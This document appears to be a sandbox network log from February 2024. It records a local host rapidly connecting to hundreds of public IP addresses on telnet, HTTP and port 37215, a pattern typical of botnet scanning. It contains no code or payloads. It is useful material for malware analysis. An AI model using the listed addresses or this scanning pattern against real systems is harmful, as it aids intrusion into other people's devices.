Feb 14, 2024 09:28:46.629997015 CET	23	1184	168.119.226.82	192.168.2.15
Feb 14, 2024 09:28:46.636462927 CET	8080	6752	62.228.9.159	192.168.2.15
Feb 14, 2024 09:28:46.637578011 CET	23	1184	185.197.251.186	192.168.2.15
Feb 14, 2024 09:28:46.638022900 CET	80	7840	112.175.243.56	192.168.2.15
Feb 14, 2024 09:28:46.639008045 CET	8080	6752	94.123.65.84	192.168.2.15
Feb 14, 2024 09:28:46.639034986 CET	7840	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:46.639101028 CET	6752	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:46.649905920 CET	80	7840	112.160.22.51	192.168.2.15
Feb 14, 2024 09:28:46.651504993 CET	8080	6752	94.43.2.21	192.168.2.15
Feb 14, 2024 09:28:46.652396917 CET	37215	8096	41.0.185.113	192.168.2.15
Feb 14, 2024 09:28:46.653182983 CET	80	7840	112.179.64.30	192.168.2.15
Feb 14, 2024 09:28:46.658780098 CET	80	7840	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:46.659405947 CET	37215	8096	41.222.15.167	192.168.2.15
Feb 14, 2024 09:28:46.659473896 CET	7840	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:46.659981012 CET	8080	6752	31.146.108.133	192.168.2.15
Feb 14, 2024 09:28:46.662580013 CET	80	7840	112.176.165.192	192.168.2.15
Feb 14, 2024 09:28:46.669298887 CET	23	1184	31.189.58.157	192.168.2.15
Feb 14, 2024 09:28:46.669749022 CET	80	7840	112.223.39.29	192.168.2.15
Feb 14, 2024 09:28:46.669930935 CET	7840	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:46.679578066 CET	80	7840	112.223.227.105	192.168.2.15
Feb 14, 2024 09:28:46.689570904 CET	80	7840	112.203.182.37	192.168.2.15
Feb 14, 2024 09:28:46.692599058 CET	80	7840	112.203.123.86	192.168.2.15
Feb 14, 2024 09:28:46.695573092 CET	80	7840	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:46.695669889 CET	7840	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:46.696541071 CET	80	7840	112.200.29.171	192.168.2.15
Feb 14, 2024 09:28:46.697293043 CET	80	7840	112.205.90.222	192.168.2.15
Feb 14, 2024 09:28:46.698676109 CET	80	7840	112.210.40.160	192.168.2.15
Feb 14, 2024 09:28:46.704009056 CET	80	7840	112.207.125.187	192.168.2.15
Feb 14, 2024 09:28:46.710261106 CET	23	1184	175.243.232.128	192.168.2.15
Feb 14, 2024 09:28:46.735220909 CET	80	7840	112.31.51.1	192.168.2.15
Feb 14, 2024 09:28:46.743065119 CET	80	7840	112.91.151.192	192.168.2.15
Feb 14, 2024 09:28:46.789990902 CET	80	58390	88.221.78.210	192.168.2.15
Feb 14, 2024 09:28:46.791698933 CET	58390	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.791698933 CET	58390	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.791747093 CET	80	58378	88.221.78.210	192.168.2.15
Feb 14, 2024 09:28:46.791902065 CET	33812	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:46.791901112 CET	60060	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:46.791901112 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:46.791960955 CET	43794	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:46.792071104 CET	80	58378	88.221.78.210	192.168.2.15
Feb 14, 2024 09:28:46.792198896 CET	80	58378	88.221.78.210	192.168.2.15
Feb 14, 2024 09:28:46.792282104 CET	58378	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.792293072 CET	58378	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:46.792515993 CET	2323	1184	154.16.156.7	192.168.2.15
Feb 14, 2024 09:28:46.812335968 CET	80	53238	88.119.167.115	192.168.2.15
Feb 14, 2024 09:28:46.812352896 CET	80	56704	88.149.181.115	192.168.2.15
Feb 14, 2024 09:28:46.812359095 CET	80	56704	88.149.181.115	192.168.2.15
Feb 14, 2024 09:28:46.812367916 CET	80	56704	88.149.181.115	192.168.2.15
Feb 14, 2024 09:28:46.812374115 CET	80	56716	88.149.181.115	192.168.2.15
Feb 14, 2024 09:28:46.812402010 CET	53238	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.812419891 CET	56704	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.812419891 CET	56704	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.812477112 CET	53238	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.812477112 CET	56716	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.812477112 CET	56716	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:46.813329935 CET	80	53226	88.119.167.115	192.168.2.15
Feb 14, 2024 09:28:46.813528061 CET	80	53226	88.119.167.115	192.168.2.15
Feb 14, 2024 09:28:46.813538074 CET	80	53226	88.119.167.115	192.168.2.15
Feb 14, 2024 09:28:46.813607931 CET	53226	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.813607931 CET	53226	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:46.999947071 CET	80	58390	88.221.78.210	192.168.2.15
Feb 14, 2024 09:28:47.001929998 CET	58390	80	192.168.2.15	88.221.78.210
Feb 14, 2024 09:28:47.027522087 CET	80	53238	88.119.167.115	192.168.2.15
Feb 14, 2024 09:28:47.030217886 CET	53238	80	192.168.2.15	88.119.167.115
Feb 14, 2024 09:28:47.033097029 CET	80	56716	88.149.181.115	192.168.2.15
Feb 14, 2024 09:28:47.033169031 CET	56716	80	192.168.2.15	88.149.181.115
Feb 14, 2024 09:28:47.073050022 CET	80	60060	112.175.243.56	192.168.2.15
Feb 14, 2024 09:28:47.073216915 CET	60060	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.073410034 CET	7840	80	192.168.2.15	95.199.35.138
Feb 14, 2024 09:28:47.073427916 CET	7840	80	192.168.2.15	95.111.41.56
Feb 14, 2024 09:28:47.073446989 CET	7840	80	192.168.2.15	95.87.225.135
Feb 14, 2024 09:28:47.073512077 CET	7840	80	192.168.2.15	95.47.7.118
Feb 14, 2024 09:28:47.073529005 CET	7840	80	192.168.2.15	95.151.144.156
Feb 14, 2024 09:28:47.073539019 CET	7840	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.073560953 CET	7840	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.073597908 CET	7840	80	192.168.2.15	95.77.117.235
Feb 14, 2024 09:28:47.073630095 CET	7840	80	192.168.2.15	95.222.46.71
Feb 14, 2024 09:28:47.073683977 CET	7840	80	192.168.2.15	95.235.218.62
Feb 14, 2024 09:28:47.073762894 CET	7840	80	192.168.2.15	95.39.164.224
Feb 14, 2024 09:28:47.073762894 CET	7840	80	192.168.2.15	95.69.134.148
Feb 14, 2024 09:28:47.073762894 CET	7840	80	192.168.2.15	95.16.145.231
Feb 14, 2024 09:28:47.073786974 CET	7840	80	192.168.2.15	95.210.3.225
Feb 14, 2024 09:28:47.073802948 CET	7840	80	192.168.2.15	95.92.133.244
Feb 14, 2024 09:28:47.073857069 CET	7840	80	192.168.2.15	95.19.195.228
Feb 14, 2024 09:28:47.073874950 CET	7840	80	192.168.2.15	95.148.113.115
Feb 14, 2024 09:28:47.073919058 CET	7840	80	192.168.2.15	95.218.52.96
Feb 14, 2024 09:28:47.073925018 CET	7840	80	192.168.2.15	95.155.213.238
Feb 14, 2024 09:28:47.073935032 CET	7840	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.073949099 CET	7840	80	192.168.2.15	95.36.98.118
Feb 14, 2024 09:28:47.073995113 CET	7840	80	192.168.2.15	95.118.196.13
Feb 14, 2024 09:28:47.074024916 CET	7840	80	192.168.2.15	95.234.181.114
Feb 14, 2024 09:28:47.074044943 CET	7840	80	192.168.2.15	95.218.202.139
Feb 14, 2024 09:28:47.074067116 CET	7840	80	192.168.2.15	95.2.66.123
Feb 14, 2024 09:28:47.074119091 CET	7840	80	192.168.2.15	95.225.152.81
Feb 14, 2024 09:28:47.074143887 CET	7840	80	192.168.2.15	95.207.69.198
Feb 14, 2024 09:28:47.074162960 CET	7840	80	192.168.2.15	95.42.69.34
Feb 14, 2024 09:28:47.074178934 CET	7840	80	192.168.2.15	95.110.248.4
Feb 14, 2024 09:28:47.074194908 CET	7840	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.074227095 CET	7840	80	192.168.2.15	95.212.163.96
Feb 14, 2024 09:28:47.074245930 CET	7840	80	192.168.2.15	95.16.240.193
Feb 14, 2024 09:28:47.074264050 CET	7840	80	192.168.2.15	95.129.133.202
Feb 14, 2024 09:28:47.074285030 CET	7840	80	192.168.2.15	95.50.8.163
Feb 14, 2024 09:28:47.074306011 CET	7840	80	192.168.2.15	95.204.111.45
Feb 14, 2024 09:28:47.074327946 CET	7840	80	192.168.2.15	95.195.118.250
Feb 14, 2024 09:28:47.074348927 CET	7840	80	192.168.2.15	95.40.204.107
Feb 14, 2024 09:28:47.074373007 CET	7840	80	192.168.2.15	95.9.200.112
Feb 14, 2024 09:28:47.074392080 CET	7840	80	192.168.2.15	95.66.135.215
Feb 14, 2024 09:28:47.074405909 CET	7840	80	192.168.2.15	95.249.202.72
Feb 14, 2024 09:28:47.074405909 CET	7840	80	192.168.2.15	95.181.5.174
Feb 14, 2024 09:28:47.074405909 CET	7840	80	192.168.2.15	95.77.46.166
Feb 14, 2024 09:28:47.074419975 CET	7840	80	192.168.2.15	95.242.107.185
Feb 14, 2024 09:28:47.074441910 CET	7840	80	192.168.2.15	95.207.113.25
Feb 14, 2024 09:28:47.074484110 CET	7840	80	192.168.2.15	95.14.143.98
Feb 14, 2024 09:28:47.074503899 CET	7840	80	192.168.2.15	95.235.49.99
Feb 14, 2024 09:28:47.074518919 CET	7840	80	192.168.2.15	95.4.77.15
Feb 14, 2024 09:28:47.074537992 CET	7840	80	192.168.2.15	95.61.157.199
Feb 14, 2024 09:28:47.074573994 CET	7840	80	192.168.2.15	95.14.179.22
Feb 14, 2024 09:28:47.074590921 CET	7840	80	192.168.2.15	95.179.117.66
Feb 14, 2024 09:28:47.074667931 CET	7840	80	192.168.2.15	95.235.213.235
Feb 14, 2024 09:28:47.074671984 CET	7840	80	192.168.2.15	95.175.2.194
Feb 14, 2024 09:28:47.074703932 CET	7840	80	192.168.2.15	95.155.163.17
Feb 14, 2024 09:28:47.074727058 CET	7840	80	192.168.2.15	95.7.25.85
Feb 14, 2024 09:28:47.074763060 CET	7840	80	192.168.2.15	95.244.137.14
Feb 14, 2024 09:28:47.074780941 CET	7840	80	192.168.2.15	95.91.137.157
Feb 14, 2024 09:28:47.074803114 CET	7840	80	192.168.2.15	95.89.234.199
Feb 14, 2024 09:28:47.074824095 CET	7840	80	192.168.2.15	95.163.104.132
Feb 14, 2024 09:28:47.074848890 CET	7840	80	192.168.2.15	95.252.121.139
Feb 14, 2024 09:28:47.074862957 CET	7840	80	192.168.2.15	95.86.157.162
Feb 14, 2024 09:28:47.074887037 CET	7840	80	192.168.2.15	95.222.48.32
Feb 14, 2024 09:28:47.074903965 CET	7840	80	192.168.2.15	95.125.166.84
Feb 14, 2024 09:28:47.074937105 CET	7840	80	192.168.2.15	95.169.206.4
Feb 14, 2024 09:28:47.074937105 CET	7840	80	192.168.2.15	95.141.223.253
Feb 14, 2024 09:28:47.074937105 CET	7840	80	192.168.2.15	95.20.31.172
Feb 14, 2024 09:28:47.074950933 CET	7840	80	192.168.2.15	95.191.66.21
Feb 14, 2024 09:28:47.074987888 CET	7840	80	192.168.2.15	95.235.162.53
Feb 14, 2024 09:28:47.075005054 CET	7840	80	192.168.2.15	95.39.37.106
Feb 14, 2024 09:28:47.075030088 CET	7840	80	192.168.2.15	95.255.14.123
Feb 14, 2024 09:28:47.075045109 CET	7840	80	192.168.2.15	95.57.244.81
Feb 14, 2024 09:28:47.075064898 CET	7840	80	192.168.2.15	95.223.120.193
Feb 14, 2024 09:28:47.075088024 CET	7840	80	192.168.2.15	95.203.15.150
Feb 14, 2024 09:28:47.075103045 CET	7840	80	192.168.2.15	95.240.235.122
Feb 14, 2024 09:28:47.075124979 CET	7840	80	192.168.2.15	95.114.184.229
Feb 14, 2024 09:28:47.075139999 CET	7840	80	192.168.2.15	95.175.193.194
Feb 14, 2024 09:28:47.075160980 CET	7840	80	192.168.2.15	95.40.129.198
Feb 14, 2024 09:28:47.075185061 CET	7840	80	192.168.2.15	95.141.128.46
Feb 14, 2024 09:28:47.075207949 CET	7840	80	192.168.2.15	95.47.178.57
Feb 14, 2024 09:28:47.075226068 CET	7840	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.075263977 CET	7840	80	192.168.2.15	95.64.188.122
Feb 14, 2024 09:28:47.075287104 CET	7840	80	192.168.2.15	95.203.125.62
Feb 14, 2024 09:28:47.075325966 CET	7840	80	192.168.2.15	95.44.149.44
Feb 14, 2024 09:28:47.075325966 CET	7840	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.075325966 CET	7840	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.075366974 CET	7840	80	192.168.2.15	95.142.239.178
Feb 14, 2024 09:28:47.075373888 CET	7840	80	192.168.2.15	95.71.124.249
Feb 14, 2024 09:28:47.075396061 CET	7840	80	192.168.2.15	95.0.215.73
Feb 14, 2024 09:28:47.075417995 CET	7840	80	192.168.2.15	95.104.200.31
Feb 14, 2024 09:28:47.075436115 CET	7840	80	192.168.2.15	95.178.103.211
Feb 14, 2024 09:28:47.075460911 CET	7840	80	192.168.2.15	95.6.180.211
Feb 14, 2024 09:28:47.075474977 CET	7840	80	192.168.2.15	95.146.28.156
Feb 14, 2024 09:28:47.075499058 CET	7840	80	192.168.2.15	95.236.69.132
Feb 14, 2024 09:28:47.075521946 CET	7840	80	192.168.2.15	95.241.23.240
Feb 14, 2024 09:28:47.075553894 CET	7840	80	192.168.2.15	95.38.141.159
Feb 14, 2024 09:28:47.075568914 CET	7840	80	192.168.2.15	95.154.161.101
Feb 14, 2024 09:28:47.075596094 CET	7840	80	192.168.2.15	95.228.159.76
Feb 14, 2024 09:28:47.075625896 CET	7840	80	192.168.2.15	95.221.73.224
Feb 14, 2024 09:28:47.075639009 CET	7840	80	192.168.2.15	95.124.47.10
Feb 14, 2024 09:28:47.075664043 CET	7840	80	192.168.2.15	95.239.136.61
Feb 14, 2024 09:28:47.075681925 CET	7840	80	192.168.2.15	95.151.63.82
Feb 14, 2024 09:28:47.075695038 CET	7840	80	192.168.2.15	95.99.96.237
Feb 14, 2024 09:28:47.075720072 CET	7840	80	192.168.2.15	95.254.27.152
Feb 14, 2024 09:28:47.075737000 CET	7840	80	192.168.2.15	95.147.147.184
Feb 14, 2024 09:28:47.075757980 CET	7840	80	192.168.2.15	95.171.238.119
Feb 14, 2024 09:28:47.075781107 CET	7840	80	192.168.2.15	95.187.171.36
Feb 14, 2024 09:28:47.075795889 CET	7840	80	192.168.2.15	95.5.127.41
Feb 14, 2024 09:28:47.075845957 CET	7840	80	192.168.2.15	95.176.244.219
Feb 14, 2024 09:28:47.075866938 CET	7840	80	192.168.2.15	95.27.5.11
Feb 14, 2024 09:28:47.075889111 CET	7840	80	192.168.2.15	95.236.102.129
Feb 14, 2024 09:28:47.075912952 CET	7840	80	192.168.2.15	95.76.99.178
Feb 14, 2024 09:28:47.075932980 CET	7840	80	192.168.2.15	95.149.7.20
Feb 14, 2024 09:28:47.075948954 CET	7840	80	192.168.2.15	95.217.69.200
Feb 14, 2024 09:28:47.075989008 CET	7840	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.076003075 CET	7840	80	192.168.2.15	95.95.60.39
Feb 14, 2024 09:28:47.076021910 CET	7840	80	192.168.2.15	95.117.62.146
Feb 14, 2024 09:28:47.076045036 CET	7840	80	192.168.2.15	95.73.203.2
Feb 14, 2024 09:28:47.076066017 CET	7840	80	192.168.2.15	95.167.178.215
Feb 14, 2024 09:28:47.076085091 CET	7840	80	192.168.2.15	95.57.39.61
Feb 14, 2024 09:28:47.076098919 CET	7840	80	192.168.2.15	95.113.99.255
Feb 14, 2024 09:28:47.076128006 CET	7840	80	192.168.2.15	95.80.146.127
Feb 14, 2024 09:28:47.076143026 CET	7840	80	192.168.2.15	95.241.91.43
Feb 14, 2024 09:28:47.076181889 CET	7840	80	192.168.2.15	95.59.60.54
Feb 14, 2024 09:28:47.076220036 CET	7840	80	192.168.2.15	95.145.15.231
Feb 14, 2024 09:28:47.076240063 CET	7840	80	192.168.2.15	95.3.38.214
Feb 14, 2024 09:28:47.076261044 CET	7840	80	192.168.2.15	95.216.213.157
Feb 14, 2024 09:28:47.076283932 CET	7840	80	192.168.2.15	95.65.114.90
Feb 14, 2024 09:28:47.076299906 CET	7840	80	192.168.2.15	95.146.103.3
Feb 14, 2024 09:28:47.076309919 CET	7840	80	192.168.2.15	95.173.156.23
Feb 14, 2024 09:28:47.076309919 CET	7840	80	192.168.2.15	95.9.68.155
Feb 14, 2024 09:28:47.076328039 CET	7840	80	192.168.2.15	95.151.12.42
Feb 14, 2024 09:28:47.076355934 CET	7840	80	192.168.2.15	95.214.220.5
Feb 14, 2024 09:28:47.076370955 CET	7840	80	192.168.2.15	95.157.102.187
Feb 14, 2024 09:28:47.076392889 CET	7840	80	192.168.2.15	95.19.233.242
Feb 14, 2024 09:28:47.076411963 CET	7840	80	192.168.2.15	95.63.154.34
Feb 14, 2024 09:28:47.076432943 CET	7840	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.076457024 CET	7840	80	192.168.2.15	95.238.192.25
Feb 14, 2024 09:28:47.076479912 CET	7840	80	192.168.2.15	95.176.170.100
Feb 14, 2024 09:28:47.076500893 CET	7840	80	192.168.2.15	95.63.138.147
Feb 14, 2024 09:28:47.076517105 CET	7840	80	192.168.2.15	95.162.139.112
Feb 14, 2024 09:28:47.076538086 CET	7840	80	192.168.2.15	95.97.179.1
Feb 14, 2024 09:28:47.076570988 CET	7840	80	192.168.2.15	95.226.11.150
Feb 14, 2024 09:28:47.076603889 CET	7840	80	192.168.2.15	95.241.54.134
Feb 14, 2024 09:28:47.076623917 CET	7840	80	192.168.2.15	95.8.112.143
Feb 14, 2024 09:28:47.076642036 CET	7840	80	192.168.2.15	95.78.188.200
Feb 14, 2024 09:28:47.076656103 CET	7840	80	192.168.2.15	95.200.205.52
Feb 14, 2024 09:28:47.076699018 CET	7840	80	192.168.2.15	95.66.253.176
Feb 14, 2024 09:28:47.076723099 CET	7840	80	192.168.2.15	95.155.106.0
Feb 14, 2024 09:28:47.076751947 CET	7840	80	192.168.2.15	95.78.109.56
Feb 14, 2024 09:28:47.076771975 CET	7840	80	192.168.2.15	95.69.17.221
Feb 14, 2024 09:28:47.076771975 CET	7840	80	192.168.2.15	95.13.79.87
Feb 14, 2024 09:28:47.076771975 CET	7840	80	192.168.2.15	95.126.7.251
Feb 14, 2024 09:28:47.076792955 CET	7840	80	192.168.2.15	95.111.97.91
Feb 14, 2024 09:28:47.076829910 CET	7840	80	192.168.2.15	95.150.216.190
Feb 14, 2024 09:28:47.076843977 CET	7840	80	192.168.2.15	95.16.27.193
Feb 14, 2024 09:28:47.076864958 CET	7840	80	192.168.2.15	95.132.84.213
Feb 14, 2024 09:28:47.076894045 CET	7840	80	192.168.2.15	95.13.17.233
Feb 14, 2024 09:28:47.076905966 CET	7840	80	192.168.2.15	95.66.245.10
Feb 14, 2024 09:28:47.076936007 CET	7840	80	192.168.2.15	95.171.113.225
Feb 14, 2024 09:28:47.076953888 CET	7840	80	192.168.2.15	95.33.30.107
Feb 14, 2024 09:28:47.077013969 CET	60060	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.077038050 CET	60060	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.077115059 CET	60068	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.077908039 CET	7840	80	192.168.2.15	95.90.236.131
Feb 14, 2024 09:28:47.079538107 CET	80	35190	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.080455065 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.080472946 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.080472946 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.080492020 CET	35198	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.093862057 CET	80	33812	112.223.39.29	192.168.2.15
Feb 14, 2024 09:28:47.093985081 CET	33812	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.093985081 CET	33812	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.094046116 CET	33812	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.094070911 CET	33820	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.121855974 CET	80	43794	112.135.211.255	192.168.2.15
Feb 14, 2024 09:28:47.121964931 CET	43794	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.121988058 CET	43794	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.122535944 CET	43802	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.122539997 CET	43794	80	192.168.2.15	112.135.211.255
Feb 14, 2024 09:28:47.265748024 CET	8080	6752	94.196.192.165	192.168.2.15
Feb 14, 2024 09:28:47.282021999 CET	80	7840	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:47.282248020 CET	7840	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.292229891 CET	80	7840	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:47.292308092 CET	7840	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.295202017 CET	8096	37215	192.168.2.15	197.119.181.207
Feb 14, 2024 09:28:47.295226097 CET	8096	37215	192.168.2.15	197.49.61.30
Feb 14, 2024 09:28:47.295248032 CET	8096	37215	192.168.2.15	197.99.132.58
Feb 14, 2024 09:28:47.295269966 CET	8096	37215	192.168.2.15	197.98.25.225
Feb 14, 2024 09:28:47.295284986 CET	8096	37215	192.168.2.15	197.141.146.226
Feb 14, 2024 09:28:47.295300961 CET	8096	37215	192.168.2.15	197.172.196.26
Feb 14, 2024 09:28:47.295345068 CET	8096	37215	192.168.2.15	197.175.80.5
Feb 14, 2024 09:28:47.295363903 CET	8096	37215	192.168.2.15	197.146.2.182
Feb 14, 2024 09:28:47.295376062 CET	8096	37215	192.168.2.15	197.128.114.142
Feb 14, 2024 09:28:47.295408010 CET	8096	37215	192.168.2.15	197.71.21.103
Feb 14, 2024 09:28:47.295417070 CET	8096	37215	192.168.2.15	197.228.74.166
Feb 14, 2024 09:28:47.295474052 CET	8096	37215	192.168.2.15	197.229.104.19
Feb 14, 2024 09:28:47.295495033 CET	8096	37215	192.168.2.15	197.44.236.55
Feb 14, 2024 09:28:47.295536995 CET	8096	37215	192.168.2.15	197.185.153.157
Feb 14, 2024 09:28:47.295536995 CET	8096	37215	192.168.2.15	197.29.4.244
Feb 14, 2024 09:28:47.295536995 CET	8096	37215	192.168.2.15	197.100.52.102
Feb 14, 2024 09:28:47.295545101 CET	8096	37215	192.168.2.15	197.93.204.151
Feb 14, 2024 09:28:47.295578957 CET	8096	37215	192.168.2.15	197.72.118.75
Feb 14, 2024 09:28:47.295615911 CET	8096	37215	192.168.2.15	197.145.181.161
Feb 14, 2024 09:28:47.295619011 CET	8096	37215	192.168.2.15	197.33.174.252
Feb 14, 2024 09:28:47.295644999 CET	8096	37215	192.168.2.15	197.254.131.75
Feb 14, 2024 09:28:47.295670986 CET	8096	37215	192.168.2.15	197.188.249.236
Feb 14, 2024 09:28:47.295681953 CET	8096	37215	192.168.2.15	197.43.99.102
Feb 14, 2024 09:28:47.295706034 CET	8096	37215	192.168.2.15	197.22.65.180
Feb 14, 2024 09:28:47.295728922 CET	8096	37215	192.168.2.15	197.113.19.248
Feb 14, 2024 09:28:47.295743942 CET	8096	37215	192.168.2.15	197.247.247.62
Feb 14, 2024 09:28:47.295766115 CET	8096	37215	192.168.2.15	197.137.106.82
Feb 14, 2024 09:28:47.295787096 CET	8096	37215	192.168.2.15	197.141.142.135
Feb 14, 2024 09:28:47.295808077 CET	8096	37215	192.168.2.15	197.221.240.9
Feb 14, 2024 09:28:47.295840025 CET	8096	37215	192.168.2.15	197.181.139.218
Feb 14, 2024 09:28:47.295844078 CET	8096	37215	192.168.2.15	197.197.31.217
Feb 14, 2024 09:28:47.295862913 CET	8096	37215	192.168.2.15	197.14.231.175
Feb 14, 2024 09:28:47.295886993 CET	8096	37215	192.168.2.15	197.100.249.182
Feb 14, 2024 09:28:47.295902014 CET	8096	37215	192.168.2.15	197.46.163.27
Feb 14, 2024 09:28:47.295923948 CET	8096	37215	192.168.2.15	197.7.87.1
Feb 14, 2024 09:28:47.295955896 CET	8096	37215	192.168.2.15	197.255.123.94
Feb 14, 2024 09:28:47.295979023 CET	8096	37215	192.168.2.15	197.39.15.253
Feb 14, 2024 09:28:47.295991898 CET	8096	37215	192.168.2.15	197.127.238.63
Feb 14, 2024 09:28:47.296029091 CET	8096	37215	192.168.2.15	197.232.159.27
Feb 14, 2024 09:28:47.296032906 CET	8096	37215	192.168.2.15	197.192.22.154
Feb 14, 2024 09:28:47.296046972 CET	8096	37215	192.168.2.15	197.99.167.132
Feb 14, 2024 09:28:47.296060085 CET	8096	37215	192.168.2.15	197.90.191.48
Feb 14, 2024 09:28:47.296097040 CET	8096	37215	192.168.2.15	197.175.12.214
Feb 14, 2024 09:28:47.296111107 CET	8096	37215	192.168.2.15	197.207.108.116
Feb 14, 2024 09:28:47.296128035 CET	8096	37215	192.168.2.15	197.191.92.176
Feb 14, 2024 09:28:47.296145916 CET	8096	37215	192.168.2.15	197.102.135.84
Feb 14, 2024 09:28:47.296164989 CET	8096	37215	192.168.2.15	197.79.19.201
Feb 14, 2024 09:28:47.296184063 CET	8096	37215	192.168.2.15	197.235.41.245
Feb 14, 2024 09:28:47.296221018 CET	8096	37215	192.168.2.15	197.183.228.165
Feb 14, 2024 09:28:47.296243906 CET	8096	37215	192.168.2.15	197.139.71.127
Feb 14, 2024 09:28:47.296262026 CET	8096	37215	192.168.2.15	197.7.98.113
Feb 14, 2024 09:28:47.296288013 CET	8096	37215	192.168.2.15	197.13.17.244
Feb 14, 2024 09:28:47.296331882 CET	8096	37215	192.168.2.15	197.83.241.119
Feb 14, 2024 09:28:47.296341896 CET	8096	37215	192.168.2.15	197.110.21.125
Feb 14, 2024 09:28:47.296359062 CET	8096	37215	192.168.2.15	197.57.217.91
Feb 14, 2024 09:28:47.296382904 CET	8096	37215	192.168.2.15	197.150.106.27
Feb 14, 2024 09:28:47.296402931 CET	8096	37215	192.168.2.15	197.140.22.90
Feb 14, 2024 09:28:47.296416998 CET	8096	37215	192.168.2.15	197.33.61.38
Feb 14, 2024 09:28:47.296437025 CET	8096	37215	192.168.2.15	197.94.188.189
Feb 14, 2024 09:28:47.296451092 CET	8096	37215	192.168.2.15	197.143.193.77
Feb 14, 2024 09:28:47.296489000 CET	8096	37215	192.168.2.15	197.255.241.76
Feb 14, 2024 09:28:47.296513081 CET	8096	37215	192.168.2.15	197.156.92.132
Feb 14, 2024 09:28:47.296530008 CET	8096	37215	192.168.2.15	197.162.93.52
Feb 14, 2024 09:28:47.296547890 CET	8096	37215	192.168.2.15	197.80.205.153
Feb 14, 2024 09:28:47.296555996 CET	8096	37215	192.168.2.15	197.62.55.116
Feb 14, 2024 09:28:47.296598911 CET	8096	37215	192.168.2.15	197.245.132.197
Feb 14, 2024 09:28:47.296602964 CET	8096	37215	192.168.2.15	197.160.179.159
Feb 14, 2024 09:28:47.296621084 CET	8096	37215	192.168.2.15	197.96.191.243
Feb 14, 2024 09:28:47.296653032 CET	8096	37215	192.168.2.15	197.132.185.179
Feb 14, 2024 09:28:47.296669960 CET	8096	37215	192.168.2.15	197.120.46.237
Feb 14, 2024 09:28:47.296689034 CET	8096	37215	192.168.2.15	197.58.187.99
Feb 14, 2024 09:28:47.296717882 CET	8096	37215	192.168.2.15	197.180.172.196
Feb 14, 2024 09:28:47.296756029 CET	8096	37215	192.168.2.15	197.60.197.116
Feb 14, 2024 09:28:47.296763897 CET	8096	37215	192.168.2.15	197.10.254.77
Feb 14, 2024 09:28:47.296786070 CET	8096	37215	192.168.2.15	197.107.90.214
Feb 14, 2024 09:28:47.296814919 CET	8096	37215	192.168.2.15	197.129.210.105
Feb 14, 2024 09:28:47.296828032 CET	8096	37215	192.168.2.15	197.139.56.94
Feb 14, 2024 09:28:47.296858072 CET	8096	37215	192.168.2.15	197.188.33.105
Feb 14, 2024 09:28:47.296900034 CET	8096	37215	192.168.2.15	197.196.241.76
Feb 14, 2024 09:28:47.296916008 CET	8096	37215	192.168.2.15	197.61.119.11
Feb 14, 2024 09:28:47.296936035 CET	8096	37215	192.168.2.15	197.183.129.85
Feb 14, 2024 09:28:47.296950102 CET	8096	37215	192.168.2.15	197.128.32.161
Feb 14, 2024 09:28:47.296977997 CET	8096	37215	192.168.2.15	197.99.219.102
Feb 14, 2024 09:28:47.296998024 CET	8096	37215	192.168.2.15	197.164.153.143
Feb 14, 2024 09:28:47.297019005 CET	8096	37215	192.168.2.15	197.177.86.59
Feb 14, 2024 09:28:47.297044039 CET	8096	37215	192.168.2.15	197.203.122.80
Feb 14, 2024 09:28:47.297070026 CET	8096	37215	192.168.2.15	197.34.23.176
